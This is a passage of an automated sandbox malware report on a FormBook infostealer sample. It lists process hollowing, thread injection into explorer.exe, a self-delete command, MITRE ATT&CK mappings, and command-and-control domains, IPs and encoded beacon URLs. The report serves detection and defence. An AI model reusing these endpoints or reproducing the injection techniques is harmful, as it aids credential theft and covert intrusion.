          Source: C:\Windows\explorer.exe | Network Connect: 162.241.62.54 80
          Source: C:\Windows\explorer.exe | Domain query: www.melodezu.com
          Source: C:\Windows\explorer.exe | Network Connect: 64.227.87.162 80
          Source: C:\Windows\explorer.exe | Domain query: www.sprinkleresources.com
          Source: C:\Windows\explorer.exe | Domain query: www.professioneconsulenza.net
          Source: C:\Windows\explorer.exe | Domain query: www.fitnesstwentytwenty.com
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe | Domain query: www.mydreamtv.net
          Source: C:\Windows\explorer.exe | Domain query: www.jorgeporcayo.com
          Source: C:\Windows\explorer.exe | Network Connect: 78.47.57.7 80
          Source: C:\Windows\explorer.exe | Network Connect: 104.21.86.209 80
          Source: C:\Windows\explorer.exe | Domain query: www.saludflv.info
          Source: C:\Windows\explorer.exe | Domain query: www.iwccgroup.com
          Source: C:\Windows\explorer.exe | Domain query: www.builtbydawn.com
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Section loaded: unknown target: C:\Users\user\Desktop\85vLO1Rpcy.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write (x2)
          Source: C:\Windows\SysWOW64\cscript.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cscript.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\cscript.exe | Thread register set: target process: 3424
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: 310000
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Process created: C:\Users\user\Desktop\85vLO1Rpcy.exe 'C:\Users\user\Desktop\85vLO1Rpcy.exe'
          Source: C:\Windows\SysWOW64\cscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\85vLO1Rpcy.exe'
          Source: explorer.exe, 00000005.00000000.665818761.0000000000AD8000.00000004.00000020.sdmp | Binary or memory string: ProgmanMD6
          Source: explorer.exe, 00000005.00000000.694406100.0000000001080000.00000002.00000001.sdmp, cscript.exe, 00000009.00000002.917555422.0000000003000000.00000002.00000001.sdmp | Binary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.694406100.0000000001080000.00000002.00000001.sdmp, cscript.exe, 00000009.00000002.917555422.0000000003000000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.694406100.0000000001080000.00000002.00000001.sdmp, cscript.exe, 00000009.00000002.917555422.0000000003000000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.694406100.0000000001080000.00000002.00000001.sdmp, cscript.exe, 00000009.00000002.917555422.0000000003000000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.684746061.000000000A716000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd5D

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 2.2.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.1.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.1.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 2.2.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.1.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.1.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 512 | Virtualization/Sandbox Evasion 2 | OS Credential Dumping | Security Software Discovery 121 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection 512 | LSASS Memory | Virtualization/Sandbox Evasion 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information 1 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 3 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 11 | LSA Secrets | System Information Discovery 11 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |

          Behavior Graph


          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          Behavior Graph ID: 452681 | Sample: 85vLO1Rpcy.exe | Startdate: 22/07/2021 | Architecture: WINDOWS | Score: 100

          Start node
            DNS/IP: www.invisiongc.net, invisiongc.net
            Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 5 other signatures
            -> 85vLO1Rpcy.exe started
                 Signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                 -> 85vLO1Rpcy.exe started
                      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                      -> explorer.exe injected
                           DNS/IP: jorgeporcayo.com 162.241.62.54, 49768, 80 UNIFIEDLAYER-AS-1US United States; sprinkleresources.com 78.47.57.7, 49762, 80 HETZNER-ASDE Germany; 14 other IPs or domains
                           Signatures: System process connects to network (likely due to code injection or exploit)
                           -> cscript.exe started
                                Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                                -> cmd.exe 1 started
                                     -> conhost.exe started


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          85vLO1Rpcy.exe | 48% | ReversingLabs | Win32.Trojan.Caynamer
          85vLO1Rpcy.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          1.2.85vLO1Rpcy.exe.2040000.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
          9.2.cscript.exe.4c87960.5.unpack | 100% | Avira | TR/Patched.Ren.Gen
          2.1.85vLO1Rpcy.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          2.2.85vLO1Rpcy.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          9.2.cscript.exe.2848758.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
          1.2.85vLO1Rpcy.exe.2080000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          http://www.melodezu.com/dy8g/?4hoDb=qBaU/+yfeYHlIZouGPofXU4iidVfFInHYvrLlGgOmZTTl18u/I/MgAYEWpAR2vhEkSQT&m4L0u=bZcPvDKxdtw | 0% | Avira URL Cloud | safe
          http://www.sprinkleresources.com/dy8g/?4hoDb=QPKcqu0vMetGK+JfgUD/8nBfSHpRH5kA0PGey6xyb3gkjUZIEhl5tlPdZ8p3XQTNaLSI&m4L0u=bZcPvDKxdtw | 0% | Avira URL Cloud | safe
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.invisiongc.net/dy8g/?4hoDb=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZrZIWjv5Kd9wj&m4L0u=bZcPvDKxdtw | 100% | Avira URL Cloud | malware
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.manageoceanaccount.com/dy8g/?4hoDb=zCCrdzdvThYaTASpe/hPmHk7ap5P+ANftyOGnlC77DjfTWm2yZ7w2vU9UFaZ0iHT58J1&m4L0u=bZcPvDKxdtw | 0% | Avira URL Cloud | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.jorgeporcayo.com/dy8g/?4hoDb=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImX53aDppb+SR&m4L0u=bZcPvDKxdtw | 0% | Avira URL Cloud | safe
          http://www.builtbydawn.com/dy8g/?4hoDb=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElPwYvBfmvX&m4L0u=bZcPvDKxdtw | 0% | Avira URL Cloud | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          http://www.iwccgroup.com/dy8g/?4hoDb=7CAQNvso9+3ggABZu/Jc7fNLxaXC+FNFfFld5zwEvttFhfWBu0C0F7PZZ+Whh9hkxniW&m4L0u=bZcPvDKxdtw | 0% | Avira URL Cloud | safe
          www.extinctionbrews.com/dy8g/ | 0% | Avira URL Cloud | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.fitnesstwentytwenty.com/dy8g/?4hoDb=IhkJQD+B0bk6+V2yAPUkLiiPXbQYCeTmh4O7f9n2kBTH706egIRBsrjYfWBeBd2LV0Ma&m4L0u=bZcPvDKxdtw | 0% | Avira URL Cloud | safe
          http://www.%s.comPA | 0% | URL Reputation | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          https://www.builtbydawn.com/dy8g/?4hoDb=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElP | 0% | Avira URL Cloud | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe
          http://www.professioneconsulenza.net/dy8g/?4hoDb=B6XRNEXBM36CngModurpGrvJhOmsW28/SGtim1Ppn9j53l0DJdxuAnVFBlFsUFB06+ev&m4L0u=bZcPvDKxdtw | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          fitnesstwentytwenty.com | 34.102.136.180 | true | false | | unknown
          sprinkleresources.com | 78.47.57.7 | true | true | | unknown
          www.professioneconsulenza.net | 89.46.109.25 | true | true | | unknown
          jorgeporcayo.com | 162.241.62.54 | true | true | | unknown
          invisiongc.net | 34.102.136.180 | true | false | | unknown
          www.manageoceanaccount.com | 104.21.40.211 | true | true | | unknown
          melodezu.com | 64.227.87.162 | true | true | | unknown
          www.iwccgroup.com | 104.21.86.209 | true | true | | unknown
          www.builtbydawn.com | 172.67.129.33 | true | true | | unknown
          www.melodezu.com | unknown | unknown | true | | unknown
          www.sprinkleresources.com | unknown | unknown | true | | unknown
          www.fitnesstwentytwenty.com | unknown | unknown | true | | unknown
          www.mydreamtv.net | unknown | unknown | true | | unknown
          www.jorgeporcayo.com | unknown | unknown | true | | unknown
          www.saludflv.info | unknown | unknown | true | | unknown
          www.cwdelrio.com | unknown | unknown | true | | unknown
          www.invisiongc.net | unknown | unknown | true | | unknown

                                            Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.melodezu.com/dy8g/?4hoDb=qBaU/+yfeYHlIZouGPofXU4iidVfFInHYvrLlGgOmZTTl18u/I/MgAYEWpAR2vhEkSQT&m4L0u=bZcPvDKxdtw | true | Avira URL Cloud: safe | unknown
          http://www.sprinkleresources.com/dy8g/?4hoDb=QPKcqu0vMetGK+JfgUD/8nBfSHpRH5kA0PGey6xyb3gkjUZIEhl5tlPdZ8p3XQTNaLSI&m4L0u=bZcPvDKxdtw | true | Avira URL Cloud: safe | unknown
          http://www.invisiongc.net/dy8g/?4hoDb=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZrZIWjv5Kd9wj&m4L0u=bZcPvDKxdtw | false | Avira URL Cloud: malware | unknown
          http://www.manageoceanaccount.com/dy8g/?4hoDb=zCCrdzdvThYaTASpe/hPmHk7ap5P+ANftyOGnlC77DjfTWm2yZ7w2vU9UFaZ0iHT58J1&m4L0u=bZcPvDKxdtw | true | Avira URL Cloud: safe | unknown
          http://www.jorgeporcayo.com/dy8g/?4hoDb=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImX53aDppb+SR&m4L0u=bZcPvDKxdtw | true | Avira URL Cloud: safe | unknown
          http://www.builtbydawn.com/dy8g/?4hoDb=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElPwYvBfmvX&m4L0u=bZcPvDKxdtw | true | Avira URL Cloud: safe | unknown
          http://www.iwccgroup.com/dy8g/?4hoDb=7CAQNvso9+3ggABZu/Jc7fNLxaXC+FNFfFld5zwEvttFhfWBu0C0F7PZZ+Whh9hkxniW&m4L0u=bZcPvDKxdtw | true | Avira URL Cloud: safe | unknown
          www.extinctionbrews.com/dy8g/ | true | Avira URL Cloud: safe | low
          http://www.fitnesstwentytwenty.com/dy8g/?4hoDb=IhkJQD+B0bk6+V2yAPUkLiiPXbQYCeTmh4O7f9n2kBTH706egIRBsrjYfWBeBd2LV0Ma&m4L0u=bZcPvDKxdtw | false | Avira URL Cloud: safe | unknown
          http://www.professioneconsulenza.net/dy8g/?4hoDb=B6XRNEXBM36CngModurpGrvJhOmsW28/SGtim1Ppn9j53l0DJdxuAnVFBlFsUFB06+ev&m4L0u=bZcPvDKxdtw | true | Avira URL Cloud: safe | unknown

                                            URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com | explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com/designersG | explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com/designers/? | explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.founder.com.cn/cn/bThe | explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers? | explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.tiro.com | explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers | explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.goodfont.co.kr | explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.carterandcone.coml | explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.sajatypeworks.com | explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.typography.netD | explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.founder.com.cn/cn/cThe | explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://fontfabrik.com | explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.founder.com.cn/cn | explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers/frere-user.html | explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.galapagosdesign.com/DPlease | explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers8 | explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.%s.comPA | explorer.exe, 00000005.00000000.666867795.0000000002B50000.00000002.00000001.sdmp | false | URL Reputation: safe | low
          http://www.fonts.com | explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.sandoll.co.kr | explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          https://www.builtbydawn.com/dy8g/?4hoDb=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElP | cscript.exe, 00000009.00000002.918279591.0000000004E02000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.urwpp.deDPlease | explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.zhongyicts.com.cn | explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.sakkal.com | explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown

                                                                Contacted IPs


                                                                Public

          IP | Domain | Country | ASN | ASN Name | Malicious
          172.67.129.33 | www.builtbydawn.com | United States | 13335 | CLOUDFLARENETUS | true
          104.21.40.211 | www.manageoceanaccount.com | United States | 13335 | CLOUDFLARENETUS | true
          162.241.62.54 | jorgeporcayo.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
          64.227.87.162 | melodezu.com | United States | 14061 | DIGITALOCEAN-ASNUS | true
          34.102.136.180 | fitnesstwentytwenty.com | United States | 15169 | GOOGLEUS | false
          78.47.57.7 | sprinkleresources.com | Germany | 24940 | HETZNER-ASDE | true
          104.21.86.209 | www.iwccgroup.com | United States | 13335 | CLOUDFLARENETUS | true
          89.46.109.25 | www.professioneconsulenza.net | Italy | 31034 | ARUBA-ASNIT | true

                                                                General Information

          Joe Sandbox Version: 33.0.0 White Diamond
          Analysis ID: 452681
          Start date: 22.07.2021
          Start time: 17:56:55
          Joe Sandbox Product: CloudBasic
          Overall analysis duration: 0h 9m 45s
          Hypervisor based Inspection enabled: false
          Report type: light
          Sample file name: 85vLO1Rpcy.exe
          Cookbook file name: default.jbs
          Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of new started processes analysed: 19
          Number of new started drivers analysed: 0
          Number of existing processes analysed: 0
          Number of existing drivers analysed: 0
          Number of injected processes analysed: 0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode: default
          Analysis stop reason: Timeout
          Detection: MAL
          Classification: mal100.troj.evad.winEXE@7/0@12/8
          EGA Information: Failed
          HDC Information:
          • Successful, ratio: 18.7% (good quality ratio 15.7%)
          • Quality average: 69.3%
          • Quality standard deviation: 35.1%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Found application associated with file extension: .exe
          Warnings:
          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
          • TCP Packets have been reduced to 100
          • Excluded IPs from analysis (whitelisted): 52.255.188.83, 23.35.237.194, 92.122.145.220, 52.147.198.201, 104.43.193.48, 104.42.151.234, 20.50.102.62, 52.251.79.25, 23.216.77.146, 23.216.77.132, 40.112.88.60, 2.18.213.74, 2.18.213.56
          • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, storeedgefd.xbetservices.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, storeedgefd.dsx.mp.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e16646.dscg.akamaiedge.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
          • Not all processes were analyzed; the report is missing behavior information
          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/452681/sample/85vLO1Rpcy.exe

                                                                Simulations

                                                                Behavior and APIs

                                                                No simulations

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                Match            Associated sample           Detection   Context
                                                                172.67.129.33    PQMW0W5h3X.exe              malicious   www.builtbydawn.com/dy8g/?A4Ll=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUHJ1zZD6cROGeNm54w==&6l-=6lY0
                                                                                 0FKzNO1g3P.exe              malicious   www.builtbydawn.com/dy8g/?8pWL=Wlch&rVW8M4=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElPwYvBfmvX
                                                                                 orders.exe                  malicious   www.furlashop.site/ni6e/?W6=dhmVnxFiqqQHtzkp6eqPey57Y8PFMjt1OTneE2bUvMahMvc1ZtnhmpLaq/pNC70nk10eiFrAbg==&UlPt=GVoxsVvHVpd8Sl
                                                                104.21.40.211    TeMdJqNMM0.exe              malicious   www.manageoceanaccount.com/dy8g/?Yn-PvXgP=zCCrdzdvThYaTASpe/hPmHk7ap5P+ANftyOGnlC77DjfTWm2yZ7w2vU9UG6jkznrjboy&x4=w4VXMtwX5BA
                                                                162.241.62.54    v8kZUFgdD4.exe              malicious   www.jorgeporcayo.com/dy8g/?i0GDM=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImUVNZCFSYJzAIvZikA==&0X=C6Ah3vPx
                                                                                 QxnlprRUTx.exe              malicious   www.jorgeporcayo.com/dy8g/?Jn=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImX53aDppb+SR&2dM8l=bXbDpfbx6FA04L
                                                                                 TeMdJqNMM0.exe              malicious   www.jorgeporcayo.com/dy8g/?Yn-PvXgP=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImUZNKSJRBZzW&x4=w4VXMtwX5BA
                                                                                 Rq0Y7HegCd.exe              malicious   www.jorgeporcayo.com/dy8g/?3f=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImX5dFzZpf8aR&XRtpal=y48HaFr
                                                                                 New order 301534.pdf.exe    malicious   www.tuzypop.com/sbqi/?ZjR=TyogNDuayMasT0oCbdt3Eat51QL3ELvKrHkWpVATBBZEFOGxOOifBgSTpUoy0eHE1TfRcYKQLQ==&ndnddT=ot9xbpDpf8H4

                                                                Domains

                                                                Match                            Associated sample            Detection   Context
                                                                www.professioneconsulenza.net    d6qU4nYIEp.exe               malicious   89.46.109.25
                                                                                                 Rq0Y7HegCd.exe               malicious   89.46.109.25
                                                                                                 242jQP4mQP.exe               malicious   89.46.109.25
                                                                www.manageoceanaccount.com       SWIFT MESSAGE DETAILS.xlsx   malicious   104.21.40.211
                                                                                                 Payment_Ref_Advice.xlsx      malicious   172.67.188.96
                                                                                                 TeMdJqNMM0.exe               malicious   104.21.40.211
                                                                www.iwccgroup.com                0FKzNO1g3P.exe               malicious   104.21.86.209

                                                                ASN

                                                                Match              Associated sample                       Detection   Context
                                                                CLOUDFLARENETUS    PAYMENT ADVICE.doc                      malicious   104.21.27.166
                                                                                   PO20210722.xlsx                         malicious   162.159.130.233
                                                                                   New order 11244332.pdf.exe              malicious   172.67.188.154
                                                                                   Z0hOr2pD7k.exe                          malicious   1.1.1.1
                                                                                   USD_SLIP.docx                           malicious   104.21.19.245
                                                                                   DHL JULY STATEMENT OF ACCOUNT.exe       malicious   104.21.19.200
                                                                                   qK3005mdZn.exe                          malicious   172.67.168.51
                                                                                   whesilox.exe                            malicious   172.67.188.154
                                                                                   Bank contract,PDF.exe                   malicious   172.67.188.154
                                                                                   Scan003000494 pdf.exe                   malicious   172.67.188.154
